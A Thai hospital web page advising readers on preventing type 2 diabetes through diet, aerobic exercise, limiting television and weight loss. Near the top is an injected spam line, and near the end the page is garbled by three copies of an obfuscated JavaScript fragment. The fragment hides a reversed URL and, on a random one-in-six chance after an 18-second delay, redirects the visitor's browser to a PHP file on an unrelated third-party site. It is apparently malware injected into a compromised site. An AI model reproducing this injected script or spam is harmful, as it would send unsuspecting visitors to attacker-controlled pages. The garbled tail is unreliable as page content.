เบาหวานป้องกันได้ อยู่ที่ตัวเรา

1173

this content porn xxx

โรคเบาหวานถือเป็นปัญหาสาธารณสุขสำคัญ มีแนวโน้มที่จะเพิ่มขึ้นอย่างต่อเนื่อง และเป็นโรคที่พบมากที่สุดในทุกช่วงวัยของคนไทยเลยก็ว่าได้ เรามีวิธีดูแลสุขภาพที่จะช่วยป้องกันด้วยการปรับเปลี่ยนพฤติกรรมไม่ให้อยู่ในกลุ่มเสี่ยงมาฝากกันค่ะ

สำหรับโรคเบาหวานที่พบมากในคนไทยเป็นโรคเบาหวานชนิดที่ 2 คือ โรคเบาหวานที่พบได้จากกรรมพันธุ์ คือ มีประวัติคนในครอบครัว เช่น พ่อ แม่ พี่หรือน้องที่เป็นโรคเบาหวาน และมีสิ่งแวดล้อมที่ส่งเสริมให้เป็นโรคเบาหวานได้เพิ่มขึ้น ได้แก่ โรคอ้วน การไม่ออกกำลังกาย ทำงานนั่งโต๊ะนาน หรือเคลื่อนไหวร่างกายน้อยไป เป็นต้น ทั้งนี้สามารถป้องกันได้ด้วยการปรับเปลี่ยนพฤติกรรมการดำเนินชีวิตให้เหมาะสม โดยการควบคุมอาหารและออกกำลังกายเพิ่มมากขึ้น ซึ่งสามารถปฏิบัติได้ตามนี้

  • อาหารที่ดีกับสุขภาพ คือ อาหารที่ทำให้ระดับน้ำตาลสูงไม่มาก (low glycemic index) มีใยอาหารมากและมีไขมันอิ่มตัวในปริมาณน้อย เพิ่มผักเมล็ดธัญพืชและผลไม้ที่มีรสไม่หวานจัดในปริมาณที่เหมาะสมในแต่ละบุคคลทั้งจำนวนพลังงานและสัดส่วนของอาหารในหนึ่งวัน การศึกษาในกลุ่มเสี่ยงต่อการเกิดโรคเบาหวานพบว่า ผู้ที่รับประทานข้าวขาวมีโอกาสเป็นโรคเบาหวานถึงร้อยละ 21 และผู้ที่รับประทานข้าวซ้อมมือมากกว่า 2 มื้อต่อสัปดาห์ ทำให้ลดการเกิดโรคเบาหวานได้ร้อยละ 11
  • การออกกำลังกาย ควรเป็นชนิดแอโรบิก คือ การออกกำลังกายอย่างหนักพอควร และควรทำอย่างต่อเนื่องเพื่อให้หัวใจและปอดทำงานได้ดี ได้แก่ การเดินเร็ว หรือวิ่งจ๊อกกิ้ง เป็นต้น ควรออกกำลังกายให้ได้เวลา150 นาทีหรือสองชั่วโมงครึ่งต่อสัปดาห์ โดยออกกำลังกายให้ได้ 3-5 วันต่อสัปดาห์ โดยที่มีวันพักระหว่างออกกำลังกาย และควรออกกำลังกายชนิดยืดหยุ่นกล้ามเนื้อได้แก่ การแกว่งแขน การยกน้ำหนัก เป็นต้น
  • จำกัดเวลาดูโทรทัศน์ จากรายงานการศึกษาในต่างประเทศ ปี พ.ศ. 2544 พบว่าทุก 2 ชั่วโมงที่ดูโทรทัศน์จะเพิ่มโอกาสโรคเบาหวานชนิดที่ 2 ร้อยละ 20 ดังนั้นจึงควรดูโทรทัศน์น้อยกว่า 2 ชั่วโมงต่อวัน เพื่อจะได้มีเวลาไปทำกิจกรรมทางกายที่เป็นประโยชน์ต่อสุขภาพมากขึ้น
  • การลดน้ำหนักตัว ในกลุ่มที่เสี่ยงต่อโรคเบาหวาน การลดน้ำหนักตัวลงร้อยละ 5 จากน้ำหนักเริ่มต้น สามารถลดความเสี่ยงต่อการเกิดโรคเบาหวานได้ถึงร้อยละ 58 และในผู้ที่เป็นโรคเบาหวานถ้าลดน้ำหนักตัวลงได้ถึงร้อยละ 10 จากน้ำหนักเริ่มต้นสามารถลดการเสียชีวิตจากโรคเบาหวานได้ร้อยละ 30-40

การปรับเปลี่ยนพฤติกรรมชีวิตเป็นสิ่งที่ทำไม่ยากและเสียค่าใช้จ่ายไม่มาก สำหรับผู้ที่เป็นกลุ่มเสี่ยงต่อการเกิดโรคเบาหวานมาร่วมกันปรับเปลี่ยน เพื่อลดโอกาสเกิดโรคเบาหวานกันดีกว่านะคะ

สอบถามรายละเอียดเพิ่มเติมได้ที่
คลินิกโรคระบบต่อมไร้ท่อและเบาหวาน

โทร. 0 2265 7777 

 

เรายึดมั่นในหลักการรักษาที่ได้มาตรฐานและมีคุณภาพมาอย่างต่อเนื่อง โดยผู้ป่วยทุกรายจะได้รับการดูแลและติดตามผลการรักษาจากคณะแพทย์ผู้เชี่ยวชาญอย่างใกล้ชิด
) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tom_title=”แพทย์ผู้เขียน” author_id=”41″ css=”.vc_custom_1572599347174{margin-bottom: 15px !important;}” tdc_css=””]
) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ton_block=”true” link=”||target:%20_blank|”]
) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ton_block=”true” link=”url:http%3A%2F%2Fwww.vichaiyut.co.th%2Fprofile_doctor%2F%25e0%25b8%259e%25e0%25b8%258d-%25e0%25b8%25ad%25e0%25b8%25b1%25e0%25b8%25a1%25e0%25b8%259e%25e0%25b8%25b2-%25e0%25b8%25aa%25e0%25b8%25b8%25e0%25b8%2597%25e0%25b8%2598%25e0%25b8%25b4%25e0%25b8%2588%25e0%25b8%25b3%25e0%25b8%25a3%25e0%25b8%25b9%25e0%25b8%258d%2F|title:%E0%B8%9E%E0%B8%8D.%20%E0%B8%AD%E0%B8%B1%E0%B8%A1%E0%B8%9E%E0%B8%B2%20%20%E0%B8%AA%E0%B8%B8%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B8%88%E0%B8%B3%E0%B8%A3%E0%B8%B9%E0%B8%8D|target:%20_blank|”]
ให้คะแนนบทความนี้
[คะแนนบทความนี้: 2.5]
เรายึดมั่นในหลักการรักษาที่ได้มาตรฐานและมีคุณภาพมาอย่างต่อเนื่อง โดยผู้ป่วยทุกรายจะได้รับการดูแลและติดตามผลการรักษาจากคณะแพทย์ผู้เชี่ยวชาญอย่างใกล้ชิด